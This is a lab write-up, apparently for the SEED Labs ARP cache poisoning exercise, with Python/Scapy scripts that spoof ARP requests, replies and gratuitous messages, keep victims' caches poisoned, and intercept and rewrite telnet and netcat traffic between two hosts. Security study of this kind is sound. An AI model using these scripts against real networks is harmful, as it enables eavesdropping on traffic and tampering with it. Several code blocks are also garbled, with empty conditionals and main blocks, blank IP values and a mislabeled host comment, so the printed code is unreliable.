ARP Cache Attack

Ifeanyi Ukadike · June 10, 2023

When a computer wants to send data within a network (not across i.e. via a router), it usually makes use of the NIC MAC address to send such data. Every computer keeps a record of IP-to-MAC-address mapping. This is called the ARP cache. It is through the help of the ARP cache that the computer knows which NIC to send data meant for a particular IP address. A computer populates (stores an entry) its ARP cache when it receives an arp request.

SeedLabs: ARP Cache Poisoning Attack Lab

Tools used in this lab

  • Scapy: scapy is a very powerful tool written in python for packet manipulation when spoofing requests with scapy, any header field you do not set would be set by scapy.
host A: this is victim 1 (
host B: this is victim 2 (
host C: this is our attacking machine  (
all three hosts are on the same LAN

ARP cache poisoning using ARP requests

When sending an ARP request, the following are the important fields to spoof in the ARP header:

  • psrc: this specifies where the ARP request is originating from
  • pdst: this specifies where the ARP request is going to
  • op: this specifies whether it is an ARP request or an ARP reply
  • hwsrc: this specifies the MAC Address of the host where the ARP request is originating from

So to perform a cache poisoning attack, you need to set psrc to the host-ip whose traffic you want to intercept and set hwsrc to your machine MAC address. What this means is that in the arp address table of the host you’re attacking, psrc would be bound to hwsrc

The below code achieves this

#!/usr/bin/env python3
import sys
from scapy.all import *

def main():
    if len(sys.argv) != 3:
    psrc_ = sys.argv[1]
    pdst_ = sys.argv[2]
    E = Ether(dst = 'ff:ff:ff:ff:ff:ff')
    A = ARP(psrc = psrc_, pdst = pdst_, op = 1)
    sendp(E/A, verbose=0)
    print(f'sent ARP request to {pdst_}')
def usage():
    print("Usage: ./ <src-ip> <dst-ip>\
    \n\tsrc-ip: IP address of the host you want to map to your MAC address\
    \n\tdst-ip: Ip address of the host whose ARP cache you want to poison\n")
if __name__ == '__main__':

Executing the above code on host c against host B and observing the traffic on Wireshark, I observed the following

  • the first entry is a broadcast message originating from host C asking for the host who has host B’s IP address
  • the second entry is a reply from host A

Taking a look at host A ARP table after the attack, it is observed that host B’s IP address is mapped to host C’s MAC address.

ARP cache poisoning using ARP replies

When sending an ARP reply, the following are the important fields to spoof in the ARP header:

  • psrc: this specifies where the ARP reply is originating from
  • pdst: this specifies where the ARP reply is going to
  • op: this specifies whether it is an ARP request or an ARP reply
  • hwdst: this specifies the MAC Address of the host where the ARP reply is going to

Below are my observations during the lab exercise:

  • When host B’s IP is already in host A’s cache, host A updates its arp cache with the information gotten from the ARP reply.
  • When host B’s IP is not already in host A’s cache, nothing happens. No entry is added.

The tests were run using the below code:

#!/usr/bin/env python3

import sys
from scapy.all import *

def main():
    if len(sys.argv) != 4:
    psrc_ = sys.argv[1]
    pdst_ = sys.argv[2]
    hwdst_ = sys.argv[3]
    E = Ether(dst = hwdst_)
    A = ARP(psrc = psrc_, pdst = pdst_, op = 2, hwdst = hwdst_)
    sendp(E/A, verbose=0)
    print(f'sent ARP reply to {pdst_}')
def usage():
    print("Usage: ./ <src-ip> <dst-ip> <dst-mac>\
    \n\tsrc-ip: IP address of the host you want to map to your MAC address\
    \n\tdst-ip: Ip address of the host whose ARP cache you want to poison\
    \n\tdst-mac: The MAC address of the host whose ARP cache you want to poison\n")
if __name__ == '__main__':

ARP cache poisoning using ARP gratuitous message

An ARP gratuitous message is a type of arp request that a host sends out to other machines so that they can update their arp cache with the new information they receive. The following characterizes arp poisoning via arp gratuitous message:

  • the destination MAC address in the Ethernet header is set to ff:ff:ff:ff:ff:ff
  • the source IP address in the ARP header is set to the IP address of the host you want to spoof
  • the destination IP address in the ARP header is also set to the IP address of the host you want to spoof
  • the destination MAC address in the ARP header is set to ff:ff:ff:ff:ff:ff
  • the operation is set to 1 to indicate an arp request

The below code demonstrates arp cache poisoning via ARP gratuitous messages

#!/usr/bin/env python3

import sys
from scapy.all import *

def main():
    # Ensure correct usage
    if len(sys.argv) != 2:
    # unpack values
    psrc_ = sys.argv[1]
    pdst_ = sys.argv[1]
    # construct packet
    E = Ether(dst = 'ff:ff:ff:ff:ff:ff')
    A = ARP(psrc = psrc_, pdst = pdst_, op = 1, hwdst = 'ff:ff:ff:ff:ff:ff')
    sendp(E/A, verbose=0)
    print(f'sent gratituos ARP request')
def usage():
    print("Usage: ./ <src-ip>\
    \n\tsrc-ip: IP address of the host you want to map to your MAC address\n")
if __name__ == '__main__':
Side notes
  • an arp request will always add an entry to the arp cache of the destination. If an entry already exists, an arp request causes the destination host to update the entry in its arp cache.
  • an arp reply will never add an entry to the arp cache of the destination. However, if an entry already exists, an arp reply causes the destination host to update the entry in its arp cache.
  • arp gratuitous message just like an arp reply will never add an entry to the arp cache of the destination. However, if an entry already exists, the gratuitous arp message causes the destination host to update the entry in its arp cache.

MITM Attack on Telnet using ARP Cache Poisoning

For this attack, I chose to carry out initial cache poisoning via arp requests and then sustain the poisoned cache via gratuitous messages. Below is the code used:

#!/usr/bin/env python3

import sys, time
from scapy.all import *

def main():
    # Ensure correct usage
    if len(sys.argv) != 3:
    # unpack values
    victim_1 = sys.argv[1]
    victim_2 = sys.argv[2]
    # construct packet for initial poisoning via arp request
    sendp(Ether(dst = 'ff:ff:ff:ff:ff:ff') / ARP(psrc = victim_1, pdst = victim_2, op = 1), verbose = 0)
    sendp(Ether(dst = 'ff:ff:ff:ff:ff:ff') / ARP(psrc = victim_2, pdst = victim_1, op = 1), verbose = 0)
    print('Performed initial poisoning...')
    # ensure continuous poisoning via arp gratuitous messages
    while True:
        print('Re-arming arp poisoning...')
        sendp(Ether(dst = 'ff:ff:ff:ff:ff:ff') / ARP(psrc = victim_1, pdst = victim_1, op = 1), verbose = 0)
        sendp(Ether(dst = 'ff:ff:ff:ff:ff:ff') / ARP(psrc = victim_2, pdst = victim_2, op = 1), verbose = 0)
def usage():
    print("Usage: ./ <victim1-ip> <victim2-ip>\
    \n\tvictim1-ip: IP address of victim 1\
    \n\tvictim2-ip: IP address of victim 2\n")
if __name__ == '__main__':

arp cache for host A


arp cache for host B


After performing the attack and ensuring that it is successful, the following are observed:

  • when IP forwarding is disabled on host C (sysctl net.ipv4.ip_forward=0) and host A pings host B, host A does not receive any response to the ping request. When the traffic is observed in Wireshark, it is noticed that there is indeed a ping request that originates from host A but no accompanying ping reply.
  • when IP forwarding is enabled on host C (sysctl net.ipv4.ip_forward=1) and host A pings host B, host A receives a response to the ping request. The reply comes from host C and is marked redirect with the next hop being host B. When the traffic is observed in Wireshark, it is noticed that there is indeed a ping request that originates from host A and an accompanying ping reply from host B. There is also an ICMP redirect from host C. However, looking closely at the captured traffic, there are two requests, two replies, and two redirects:
    • the first request has host A’s MAC address as the source address in the Ethernet header and host C’s MAC address as the destination address in the Ethernet header
    • the second request has host C’s MAC address as the source address in the Ethernet header and host B’s MAC address as the destination address in the Ethernet header
    • the first reply has host B’s MAC address as the source address in the Ethernet header and host C’s MAC address as the destination address in the Ethernet header
    • the second reply has host C’s MAC address as the source address in the Ethernet header and host A’s MAC address as the destination address in the Ethernet header
    • the first redirect has host C’s MAC address as the source address in the Ethernet header and host B’s MAC address as the destination address in the Ethernet header
    • the second redirect has host C’s MAC address as the source address in the Ethernet header and host A’s MAC address as the destination address in the Ethernet header.

The next step involves setting up a telnet connection between host A and host B, intercepting the traffic on host C and spoofing it. To successfully perform the MITM attack, you have to turn off IP routing in host C. This means you are fully responsible for the traffic you pass between host A and host C.

#!/usr/bin/env python3
from scapy.all import *

iface_ = 'eth0'
hostA = ''  #IP address for host A
hostB = ''  #IP address for host A
port = '23'

def main():
    # Here we do not want to capture any traffic that our program generates #
    filter_ = f'tcp port {port} && (not ether src 02:42:0a:09:00:69)'
    sniff(iface = iface_, filter = filter_, prn = spoof_pkt)
def spoof_pkt(pkt):
    if pkt[IP].src == hostA and pkt[IP].dst == hostB:
        # save a copy of the captured packet by first type casting it as binary data
        # then initialize it as an IP packet
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)              # force recalculation of IP checksum
        del(newpkt[TCP].payload)        # delete existing payload
        del(newpkt[TCP].chksum)         # force recalculation of TCP checksum
        # Check if payload exists and spoof
        if pkt[TCP].payload:
            data = (pkt[TCP].payload.load).decode()     # decodes the payload so we can work on it
            if (data == '\r\x00') or (data == '\r\n'):
                send(newpkt / Raw(load = data), verbose=0)
                newdata = 'Z'                           # replaces the payload with 'Z'
                send(newpkt / Raw(load = newdata), verbose=0)
            send(newpkt, verbose=0)
    elif pkt[IP].src == hostB and pkt[IP].dst == hostA:
        newpkt = IP(bytes(pkt[IP]))
        # Check for payload and replace
        if pkt[TCP].payload:
            data = (pkt[TCP].payload.load).decode()
            newdata = data
            send(newpkt / Raw(load = data), verbose=0)
            send(newpkt, verbose=0)
if __name__ == '__main__':

mitm attack


side notes:
  • Though I made use of arp gratuitous messages during the attack, it should be used sparingly as every host on the network will receive the message and update its arp cache accordingly.
    • A better approach is to use arp replies that target the specific hosts you want to attack.
  • Also, the re-ARP time I chose was too much, as such the fake entries would get replaced from time to time; a smaller time would be ideal.

MITM Attack on Netcat using ARP Cache Poisoning

Unlike the telnet MITM attack where the spoofing happens one-way, in this attack, the spoofing happens both ways.

#!/usr/bin/env python3
import re
from scapy.all import *

iface_ = 'eth0'
hostA = ''  #IP address for host A
hostB = ''  #IP address for host A
port = '9090'       #netcat port

def main():   
    filter_ = f'tcp port {port} && (not ether src 02:42:0a:09:00:69)'
    sniff(iface = iface_, filter = filter_, prn = spoof_pkt)
def spoof_pkt(pkt):
    if pkt[IP].src == hostA and pkt[IP].dst == hostB:
        newpkt = IP(bytes(pkt[IP]))
        # Check for payload and replace first occurence of my name with 'a'
        if pkt[TCP].payload:
            data = (pkt[TCP].payload.load).decode().lower()
            newdata = re.sub('ifeanyi', 'aaaaaaa', data, 1)
            send(newpkt / Raw(load = newdata), verbose=0)
            send(newpkt, verbose=0)
    elif pkt[IP].src == hostB and pkt[IP].dst == hostA:
        newpkt = IP(bytes(pkt[IP]))
        # Check for payload and replace first occurence of my name with 'b'
        if pkt[TCP].payload:
            data = (pkt[TCP].payload.load).decode().lower()
            newdata = re.sub('ifeanyi', 'bbbbbbb', data, 1)
            send(newpkt / Raw(load = newdata), verbose=0)
            send(newpkt, verbose=0)
if __name__ == '__main__':

mitm nc host A

hostA -nc-mitm png

mitm nc host B

hostB -nc-mitm

side note:
  • when there is a payload, the psh flag is set.
  • you need to convert the packet to bytes because, in the end, you want to make a copy. Since the packet is an array, assigning it directly will not create a copy.

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